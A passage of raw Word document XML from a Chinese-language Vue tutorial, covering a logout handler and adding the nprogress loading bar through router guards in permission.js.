      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    store.dispatch("logout")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52F616" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB7760C" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>跳转到登录页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C386BDA" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    router.push("/login")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E343A" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49769173" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提示退出登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B6D6B2" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    toast("</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55575669" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129ADBA1" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E86F07" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403E929" w14:textId="44F83A95" w:rsidR="005F6D50" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751482D6" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEC4DBF" w14:textId="503ADFC8" w:rsidR="005F6D50" w:rsidRDefault="00011F25" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="701" w:name="_Toc159780131"/>
      <w:r w:rsidRPr="00011F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局</w:t>
      </w:r>
      <w:r w:rsidRPr="00011F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00011F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进度条实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="701"/>
    </w:p>
    <w:p w14:paraId="3A6F518F" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B4D851" w14:textId="67A898DA" w:rsidR="008D2D7C" w:rsidRDefault="008D2D7C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网中搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nprogress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98A520" w14:textId="1E4A7C12" w:rsidR="005F6D50" w:rsidRPr="00011F25" w:rsidRDefault="008D2D7C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D2D7C">
        <w:lastRenderedPageBreak/>
        <w:t>https://www.npmjs.com/search?q=nprogress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03B616" w14:textId="6B419F4D" w:rsidR="005F6D50" w:rsidRPr="00181907" w:rsidRDefault="008D2D7C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D2E54" w14:textId="755CBFAA" w:rsidR="005F6D50" w:rsidRDefault="008D2D7C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D2D7C">
        <w:t>https://www.npmjs.com/package/nprogress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697192B" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3971C309" w14:textId="4C122666" w:rsidR="00AD6FCD" w:rsidRDefault="00AD6FCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD597E" w14:textId="193BBCFF" w:rsidR="005F6D50" w:rsidRPr="00ED3D57" w:rsidRDefault="00AD6FCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3D57">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm i nprogress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F0C91" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A1EFB1" w14:textId="60D2E864" w:rsidR="005F6D50" w:rsidRDefault="00ED3D57" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入该库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE482B" w14:textId="00F7223E" w:rsidR="00ED3D57" w:rsidRPr="00ED3D57" w:rsidRDefault="00ED3D57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3D57">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import "nprogress/nprogress.css"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74752B0B" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E014BB7" w14:textId="76300010" w:rsidR="005F6D50" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>per</w:t>
      </w:r>
      <w:r>
        <w:t>mission.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局</w:t>
      </w:r>
      <w:r w:rsidR="008C1E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载该进度条</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C29C1A" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210AE8FE" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import router from "~/router"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A990EF9" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { getToken } from "~/composables/auth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE030DD" w14:textId="77777777" w:rsidR="003C4313" w:rsidRPr="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">import { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF4FEC" w14:textId="77777777" w:rsidR="003C4313" w:rsidRPr="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    toast, showFullLoading, hideFullLoading </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969EF12" w14:textId="77777777" w:rsidR="003C4313" w:rsidRPr="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>} from "~/composables/util"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00055352" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import store from "~/store"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A12BB" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058D74A4" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC07DB7" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>router.beforeEach(async (to, from, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3898E" w14:textId="77777777" w:rsidR="003C4313" w:rsidRPr="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB4526" w14:textId="71E0EFA3" w:rsidR="005F6D50" w:rsidRPr="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4313">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    showFullLoading()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C88305" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215723D8" w14:textId="12945A16" w:rsidR="005F6D50" w:rsidRPr="00181907" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改进度条样式、高度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706E4D2" w14:textId="48FE2364" w:rsidR="005F6D50" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选取进度条的相关配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E850D7A" w14:textId="034BF1A4" w:rsidR="005F6D50" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1381C466" wp14:editId="4412A7AE">
            <wp:extent cx="3669277" cy="1964075"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="7812898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89860" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3675608" cy="1967464"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6162DC35" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A6C3C2" w14:textId="532CBC5C" w:rsidR="005F6D50" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处可以看到进度条的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素，右键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9A096" w14:textId="25C49976" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处可以简易的更改进度条的颜色</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0AF89" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354AEE3E" w14:textId="1AC08387" w:rsidR="005F6D50" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>per</w:t>
      </w:r>
      <w:r>
        <w:t>mission.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局后置该进度条</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A28157" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73489EA6" w14:textId="41745E73" w:rsidR="005F6D50" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> router</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的全局后置钩子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB4169" w14:textId="5270A66A" w:rsidR="005F6D50" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003C4313">
        <w:t>https://router.vuejs.org/zh/guide/advanced/navigation-guards.html#%E5%85%A8%E5%B1%80%E5%90%8E%E7%BD%AE%E9%92%A9%E5%AD%90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190943C5" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1379A241" w14:textId="1CE314DA" w:rsidR="005F6D50" w:rsidRPr="00181907" w:rsidRDefault="001B7CFF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面渲染完之后，会触发后置钩子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8EBF2" w14:textId="77777777" w:rsidR="001B7CFF" w:rsidRDefault="001B7CFF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>router.afterEach((to, from) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B05F62" w14:textId="77777777" w:rsidR="001B7CFF" w:rsidRDefault="001B7CFF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  sendToAnalytics(to.fullPath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14198495" w14:textId="3D47FC7B" w:rsidR="003C4313" w:rsidRDefault="001B7CFF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FFFD54" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A65802" w14:textId="6F3A07BE" w:rsidR="003C4313" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们触发的动作不是这个</w:t>
      </w:r>
      <w:r>
        <w:t>sendToAnalytics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而是</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1E1A">
        <w:t>hideFullLoading()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B0C0F" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5A724B" w14:textId="6FF3C2F9" w:rsidR="003C4313" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>permission.</w:t>
      </w:r>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全部代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB109BB" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB56F95" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import router from "~/router"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A868BC2" w14:textId="77777777" w:rsidR="008C1E1A" w:rsidRDefault="008C1E1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
